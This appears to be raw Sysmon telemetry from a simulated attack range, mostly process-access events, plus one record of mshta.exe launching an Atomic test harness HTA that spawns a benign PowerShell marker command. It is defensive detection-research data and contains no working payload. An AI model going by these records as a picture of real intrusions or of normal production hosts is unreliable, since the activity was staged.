16:09:48.723{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030710Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030709Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030708Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030707Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030706Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030705Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030704Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030703Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030702Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030701Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030700Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030699Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-55CC-6008-F406-00000000A301}4400C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030698Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030697Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030696Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-55CB-6008-F306-00000000A301}78283252C:\Windows\SysWOW64\mshta.exe{7901BC46-55CC-6008-F406-00000000A301}4400C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\System32\windows.storage.dll+1240e6(wow64)|C:\Windows\System32\windows.storage.dll+123da1(wow64)|C:\Windows\System32\windows.storage.dll+123e73(wow64)|C:\Windows\System32\windows.storage.dll+124b45(wow64)|C:\Windows\System32\windows.storage.dll+1239f1(wow64)|C:\Windows\System32\windows.storage.dll+125d40(wow64)|C:\Windows\System32\windows.storage.dll+125fbc(wow64)|C:\Windows\System32\windows.storage.dll+1258a5(wow64)|C:\Windows\System32\shell32.dll+1a82b4(wow64)|C:\Windows\System32\shell32.dll+1a818e(wow64)|C:\Windows\System32\shell32.dll+13be0a(wow64)|C:\Windows\System32\shcore.dll+2fffa(wow64) 154100x800000000000000030695Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.720{7901BC46-55CC-6008-F406-00000000A301}4400C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host fe74ca3e-fcfd-49e4-9327-bc62fc3cb2da; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=65D86C34814C02569E2AD53FD24E7F61,SHA256=8133502266008B77DE7921451E1210B0EF3F0ED2DB7D8D3EE0C3350D856FA6FA,IMPHASH=5E0145CEF36FA9BFBA7DE33AA683B8ED{7901BC46-55CB-6008-F306-00000000A301}7828C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} 10341000x800000000000000030694Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030693Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.723{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030692Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.708{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030691Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.708{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030690Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.708{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\W